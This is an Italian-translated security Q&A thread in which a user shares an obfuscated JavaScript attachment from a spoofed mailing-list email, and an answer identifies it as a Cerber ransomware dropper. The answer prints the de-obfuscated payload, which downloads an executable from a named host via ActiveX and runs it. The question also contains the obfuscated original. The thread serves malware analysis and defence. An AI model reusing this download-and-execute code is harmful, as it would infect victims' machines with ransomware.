De-offuscamento di javascript dannosi in e-mail falsificate

6

Due giorni fa ho ricevuto un'e-mail sospetta.

Il mittente era una mailing list, di cui sono membro, ma proveniva da un sottodominio webhosters (applegate.dreamhost.com). Il contenuto era approssimativamente correlato a una discussione precedente su tale mailing list (vedi il contenuto di seguito).

La posta conteneva un collegamento a un file .zip con il mio nome completo in esso e intitolato come documento .doc con estensione .js.

Solitamente ignoro tali messaggi, ma ciò che mi ha reso sospetto è il fatto che l'e-mail fosse collegata a una discussione precedente e contenesse il mio nome completo, che non è né registrato a quell'account né l'ho mai usato in nessuna quella lista.

Quindi ho deciso di dargli un'occhiata e ho scaricato lo zip.

Ora ho un file javascript offuscato e non so come andare avanti da qui.

Lo script consiste in un'enorme stringa alfanumerica non leggibile e molte operazioni con le stringhe che sembrano ottenere il contenuto originale da quella stringa alfanumerica. (vedi script sotto)

Testo di posta:

"Re: [<list name obfuscated>] Kaffee"
<br>
<br>
<a href=3D"http://soldbychuck.com/<full path obfuscated>"><name obfuscated></a>

JavaScript:

function ddtcz()
{
    var qglpa="d4c6ec307dd1966e896bc517cf8361ce167c3566e6428b496fcdb6db6f7cfde4ccc769e3a7cec269a324ea047ac8067dcc65a4a5df6e7af3c64d9920a7b7df697af7a64e8524adb28f796bd9c69b6364a1564ead6aca469b606bf3163c2821d4673cec7ce867adaa71fcb73ab67ee4169a677af1028f7b70bef65d6d64c4640ff17ccbc7cac978cab28cc235e9228c5866b886da2d7fe8228b3e49b9a6ba087cde261b8f7ec686dcdb50e1447c256ab1c62c6e6dca86bac17cc6120da92ad1d45e8a5bf7a50efc45b3d44e833aedd26cd050c6e45df044a8040e725cd395cb1758e592af4121e3d33f9b70c1165b9e64e9740c7d7cdfe7ca2178ce526eb967aaa78e746ddb466d1b20df52aa6a4fef94deea5ce7a2aa6624d6128b577ddf27af9364c3124f4628c246eee469dd064b1f7bda56dd1021e9833a4e70bb365b8664dd840ec77ca657cd0578d3e26ebe7bcb96decc66e186ce5f20cdb21fb933bbf61c686effa28fb620f3170b1d65adf64dd340c317caeb7cf3878dad26a8b7bf587ca1a69a6a7ce787dee67ba6828a9835f4035bc528acc3ae8138b8238e0821d9f28a6d73c647ae7b6db3f7ce7a7db987ae6f66aa728a0e6bd3969c4f64b0564c8a6abcc69ab46bfeb63be220aec70d2665da964a2b40e767cadc7cf1078d2626ec55ade56df247bc0678f2e67b2266a187bc366d"+
    "be74af0867a856cc2571fc624e4f28bee6eb5169c6164eb47bbf46ddad21ac533b4675dd26dec564f157bf506df0f73e807aaa86db437ca5f7dc027af3e66f2b28adb6bc0e69e6064e4164c5a6ae9f69a036beec63aae20e7166f9f7dcf864cdd64eb124a3528f1c7cd277af167dd1e6dd1721dbf33c3c75e0a75f066bf0869a697cfe06bbba60d6b28ddb20e786dfda7adc47ab8c67d567aa5b21d2a73b667affb6dd797cb5e7df2d7acb066de228b966bf0a69c3c64a5264c2e6aaa769dfa6bdac63c1920a0866af17dc0064aeb64e1e24a7228e9c7cc3a7aac57de456dc5d21f7c33ef675c1675ae76eaec7dbe666e586bd647ce3861b9b67a7366e4228b026fdb26dec17cf1e4cae569d007cf9c69bb620acb6baaf69bd964c7564c726ac3269c426bfca63b0321adf73cda7cb157aa4371f0073eee6fa836daf77cb034cefc69a207ce9869dc84eefb7aaa567d0565dac5dfca7aae464bd320ad42afcc60a607cd597cc5378ffb32e8727f3327c527fd0e7ff0c7fa5026e7e6fc246de887aa2769e2d64bd16cc466fddf67ca87abbc6de9426f156baeb67d2d65eef27f4b66f0e6da2c7fa977bdc327bab39c8b3ff8a26c1b6dbfb70bbf6de982aea024fa228a3f6eb897deee66fb86bc487ca9761fc267fba66ba520f7f7ae926dfd97bcd87dc9464fd77cbee24fbb28e776dc027af687a"+
"d4167f1f7ab6b21fb428e9273bd161b9c6ee7428cfc20ca329e576dae77ae4c7adf867ede7ae3c21e7673f7b7aec06df447ce497db487ad2b66cba28e086be9069d8164e4764d336abf769dca6ba1d63dae20b2b7aee56dbcc7be757de6964c1a7cd5024ec628dd76ec6269c0364b737bcbf6dba621d0b33aeb75f9e6db9c64f307baae6da2973b5e6fcca6dc167cf9e4cc0e69a597ca0169e544ed6d7ac9e67ad565e515dda17aa6964eb320ed72ace160dd67cf6b7cdd478dd132fd527f8f27f847fc8e7fc7d7fedc26e606fb2e6deac7ab3a69be864dce6cc086ffef67d857ac736db6826fa06bfa467dd765b2627f0266f1b6daaa7fa637bbc927c1d39ed93fda326f416da7270c3a6ddda2abe624eea28a586edc87dcb666e5e6bae47ca2a61b0c67e3066d7920e787ad8c6da297bd957de9964eb97cad024f2428d166da0c7ad937aa3a67e5b7acd521fcd28bb973fd661ca86ed3828e6220fea29e3c6dd227ab9f7ad5b67c987ae5621bae73f437ab386dbf87cec07df6a7af0466f3928c916be8669bbe64b7464ca66aef469cd16be0663f6e20e227ac9a6dc837bfbd7df1564e8f7cb6d24dcb28dc56ee7a69e6b64ec57bd4c6dfe921db933eae75ee66df9264c2d7bd156dbd073ad76fc806da507cdf54cade69aae7cc6869dc04ec707adb867bc565d3c5db527affe64a1d20a392a"+
"a0f60d2a7ca727cf1d78a5a32cfc27b2127bff7fbee7fa127fd2b26d0c6fbb46db757aa9069fe864d406cd986fcd867ce87ad006db3326a6d6bba467dcc65a9c27d1e66b086df257fa947bd3d27b7139c873fbc126c6d6db8670e276de5e2ace124f2028ebb6eff37df4a66b776bbcb7cae461cf567fd066f4920ffa7acd66da047bb787de0d64bda7cafa24b6028d276dad07ada97ab2667d5e7ae9721b8128acd73edc61c226ea0428cb220a6c29d0f6de437ae1b7ab6467b9e7aa6d21edf73af87ab636dc897ca127dae57abd666e2a28a736ba9969e7664f8464bb06ac2169e526ba5163c9d20f7e7ac966dd0d7ba957dc6b64f087cb2024b2d28c436ec0a69b6164bc07bd636dc8b21ff133c0075efb6dc4d64b017bc106da6e73a9b7af216de997cd487dda17ab9e66e1328f5c6bfbd69bb364bdb64e9d6aa7769de06be9563abc20aad66b727da2c64e8964ab724fae28db77ce467ad4f7df5a6dd5621c8b33d8d75c6575e6e21b2a33ba675d0975a3c21ee133d0675e1c75f0521cf033fdf75f3e6bc7a69f157cb286ba1760aa128ca220b5a6dcc07aa077ae5967eae7ad7121ea273bb37afcc6df487ce7c7ddd97aad366dc728ab26ba5869a3364a8d64b306aafd69dc46bb5163e6f20efb66ce87dd1c64a2f64a4724e9928d087cc347ad787df5d6dd4c21cab33f3c75d3d75d626e"+
"e607dcf466e666baec7cdb261c6667bae66e8328f266fd0a6df9e7cbef5cdf46de1465fbf78f344ea7f61a7764b386ddc158b9969ad97ca7760b5820d1321cc673ffc7cde37aa4671cc373dea7ea2969d3f7ae8428c146ed817be3f28fcf35ec228b5f66ccd6dade7fd8328c8049ff06be927ce8561f327ef1d6df5350faf47dbc6ad6462dca6db896be617ce4920b1a2abbb5bb9e6bb4a7abb661e4a78bf87cf3e61c1566c196fe5926d054ebcc61b2e64e5b6db4e5be7d71c417bb027cde36daf765f8147ebc6affd62fc36dc166bcfc7cb512aca021c5033d897ee3e69e3a7aff028db77cf3765a0678efa4ee5561da064a416dd4446d4669be565e0e6db6328f7c35a6a28f4f2aac054dfd54f922ae2528b7423d5d28c0345d6969c8f7ca4260e5f26dfc7ac0569c8766fbc6ce4267fba65e6120cc821ccb26cce7cc6f67ac95bc4e7cfeb7adef61dc066bbe6fc4b20e093bd263ed8a21c0826eeb7beba7dd5a6adf87ba447ca977ae7e20cf23af8924cf228fd131dcc21b7228ee123c2428d4c2ae2326e826de3970d976dd752adf133c277ede669d687afdb28dcc7cfb465fb778b4e4efc661e7564ad76dc7658ffa69ba97ce3560fde28eaa35cef28cba6efb27babe26c364ffe46dc4f7ce415bbef78bf96de686bfb361c8f69d8064dfb4eeab67a3f64a336ca726deae7ad9520e613a"+
"bd821a7e28ded23cd928aeb7caed65a1478bed4eb8761c8c64da06debe46e6f69fbc65ccb6daca33eea7aa3a6de637cbca7da557ad5e66d4628d127cb6f65a6b78f4a4ec5c61a3264a8f6df9458a3869acb7cc7b60cb133cb775a706bfbf69cb17cdf96bcb160dc428ad120f476dcb27ad2d7ae4467dfe7ac6b21df073a657aae26dc1f7ccd37df6f7aef166fd428e726eed869d7664b7a7bd906ddda33d4975f1d75deb6edb97deae66e0d6bc447cf8a61c1367aa166f4528bf67ba9569e417ec2a6dc155cb8967c5e5cac16dada65b0d78cdc20fe66cac969a4a7cf9b69ab424d2828d346bd5269b8a64af964ea86abb569fc86bc9163a9c21c2f73f017ca357aa6c71f7b73b567ef9269a6f7acc728dff78b4169b1a7cb2c60c4328b1035e6f28c276fc2b6db097cf275cd706dd0a65bcc78a514eb9261f9764fd96da5058e0469c567cfeb60c0620af221ee733e4e61e186ecb628ed020db478f2969ad87cf5260a6121b3173d247ed2569a817ac7f28ee067bab6afb062b9d5bba37cbf67ab976dd2969f3165f8728f8635ba128a6c66d066dcde7fd3f28e7749be96bfba7cf9361b5a7ed056dd0a50c3447f026af3462d1a6da606bd367cbef20c332aebb49b654ceb847b714cb244aca426aa95bf4b7ce7a7aecd6dac069f2f65a1a2ac4121d8333ffc67e186adba62bb25be0d7cf0a7a"+
"c5b6db6c69ede65e7726a3647e3778cb26daec66ad620e0f21de433c4967a376aa3c62d5f5be317cb8c7ac9b6da0069c0465c4326d075cab071ddb78b7e6db5328b9035af328f1b39b8533dd967f826aa0d62d3a5bc827ccb67ac1f6da1c69bdc65e3526ba25ff597ae7361f157cc7c6ddc820e586cf7969da67cba869df321db833bad67c7d6aff562c715be567cc1b7ae966dcde69f7f65e2a26c5658bab67a6a7bcc161cb67cf3661c2f67e8b66e5328f4435ca928ff338c1933a7567ad16ac0362f255bffb7ccce7ad946dfff69b0d65c2d26e455bb6269bcb7ec0c6df5b5cca867c4e4eded61d5864bb06dbac20ce278d4f69b097ca5c60fa824b1a28baa3aa3f21d8033aa567e246aa0862ef25bcf67cba17adf26db2b69e2f65fa626cce4bfa264eab67c907bce86de3320ec121e2233fe47adcd6de407cee57deff7af6866bc728fa06be9669e9764a4764bc46abb869fa76ba0663e5a20c9878e5269c307cf3260b4624d9328ebd6eb9869f0264e077bd1e6daf421a6733f2975e6c6dbe664cd27bb2a6dfc428fbd73b6d7ab8b6dc017cf637db597aa8866cd528c176bab369c9f64bb564afb6af5669f2a6be7f63c8720ef466b757dd9e64ff864f2424e2328fd87cea97ad0f7dd176da1521b4b33cd475ca275e636bb5569be27cfec6bb0660b4728d4720e8a6dde97ae737ae6967"+
"a9d7acdc21d0b73bf67ad306dadd7ccc57da747af5066e5e28c786bbd569e6f64fad64a516af6d69dd06bfe163ea620d9066df17da2d64b2464bdd24af328a097ce267adf67ddf16de8921c1833d1975c6a75d986fc066dd0e7ca924cc1e69e0d7ce8669ce620e876ecdb7da7566dfd6be877ce0e61e2e67ee966ffe28a6f20c476ceb569ddb7ce7069f6124a4a28a4c6da3c7adea7ad2e67d047ae8e21a2c28ef373c0961cbb6eace28ed320f7229ce46dc8c7ad747ad9567b747acdd21e5073f877bf7469e3a7ee9a6dad35ce8967ae25cc596dfc665dca78a8320c496cf1a69ce37ca3169a2824f4828eac6ec697dfd566cec6bc7e7ca2161f8167e8366ea428c6820e4378d9869b567cc0560b2b24b3c28bd56dbcc7acb77af3c67b2e7abb921ffc28a7773ca961afa6ee4928b8620ef129ca46dac57aa217affe67c167ae8121c9e73a837cdaa7aea071a1473b317ed6269de17ad8128e687fec17bed860e9328d9c35b9c28cde66c756dce57fd8b28d6149a4d6ba1a7cd1461fab7ecd46db4250b0847c276af0d62c346dd376bb487cab920b732aed15fa245bb5c6bdbf7aa8861efa78a7c7cdbe26abb5bdf260fde6dfe164e3564fd12aff821bd733fec7fd997bd0460b3326cfe5acbe7dca266f8e20f3d78b5a69d2a7ccb360e5c21b9e33cef75c606bbb469c7b7cc3d6bb8360e2528"+
"c9e20d946dcbc7ac2b7ab8167fcb7aa4321f0628dcc73faf75a3775ede75b5a21e0c33fd575fb175cc521d9d33";
var jlusw;
while(true){
    try
    {
        jlusw=(new Function("rrxoc","var ujfnb=rrxoc"+wutob()+"/\S{5}/g),amdeo=\"\",vrhqs"+wutob()+"ile(vrhqs<ujfnb"+wutob()+"gth){amdeo+"+wutob()+"e"+wutob()+"ujfnb[vrhqs].substr(3,2),16)^8);vrhqs++;}eval(amdeo);")(qglpa));
        break;
    }
    catch(er)
    {
    }
}
return jlusw;
}
function wutob()
{
    var nnyfm=new Array("_3da","_gda","=String.fromCharCod","(parseInt(",".match(","=0;wh",".len","_aas","-_ad");
return nnyfm[Math.floor(Math.random()*nnyfm.length)];
}
ddtcz();

Qualcuno può aiutarmi a scoprire cosa sta facendo questo script o qualcuno ha idea di come un hacker possa ottenere questi dati privati?

Pensi che si tratti di un attacco mirato o di una parte di un attacco automatico?

Nessun altro della lista ha ricevuto una mail simile. L'account di posta proviene da google e la mailing list è un googlegroup.

    
posta Malcolm X 09.01.2017 - 02:18
fonte

1 risposta

8

Questo script tenta di infettare il tuo computer Windows con Cerber ransomware .

Il segmento Javascript offuscato scarica un file eseguibile da http://www.geraldgore.com/news/17.exe in un file temporaneo e lo esegue, utilizzando Controlli ActiveX .

Il l'analisi virustotale di quel file binario suggerisce che si tratta di una variante del ransomware di Cerber.

Questo è il carico utile de-offuscato:

function getDataFromUrl(url, callback) {
    try {
        var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
        xmlHttp.open("GET", url, false);
        xmlHttp.send();
        if (xmlHttp.status == 200) {
            return callback(xmlHttp.ResponseBody, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}

function getData(callback) {
    try {
        getDataFromUrl("http://www.geraldgore.com/news/17.exe", function(result, error) {
            if (!error) {
                return callback(result, false);
            } else {
                getDataFromUrl("http://www.geraldgore.com/news/17.exe", function(result, error) {
                    if (!error) {
                        return callback(result, false);
                    } else {
                        getDataFromUrl("http://www.geraldgore.com/news/17.exe", function(result, error) {
                            if (!error) {
                                return callback(result, false);
                            } else {
                                return callback(null, true);
                            }
                        });
                    }
                });
            }
        });
    } catch (error) {
        return callback(null, true);
    }
}

function getTempFilePath() {
    try {
        var fs = new ActiveXObject("Scripting.FileSystemObject");
        var tmpFileName = "\" + Math.random().toString(36).substr(2, 9) + ".exe";
        var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
        return tmpFilePath;
    } catch (error) {
        return false;
    }
}

function saveToTemp(data, callback) {
    try {
        var path = getTempFilePath();
        if (path) {
            var objStream = new ActiveXObject("ADODB.Stream");
            objStream.Open();
            objStream.Type = 1;
            objStream.Write(data);
            objStream.Position = 0;
            objStream.SaveToFile(path, 2);
            objStream.Close();
            return callback(path, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}
getData(function(data, error) {
    if (!error) {
        saveToTemp(data, function(path, error) {
            if (!error) {
                try {
                    var wsh = new ActiveXObject("WScript.Shell");
                    wsh.Run(path);
                } catch (error) {}
            }
        });
    }
});
    
risposta data 09.01.2017 - 02:35
fonte

Leggi altre domande sui tag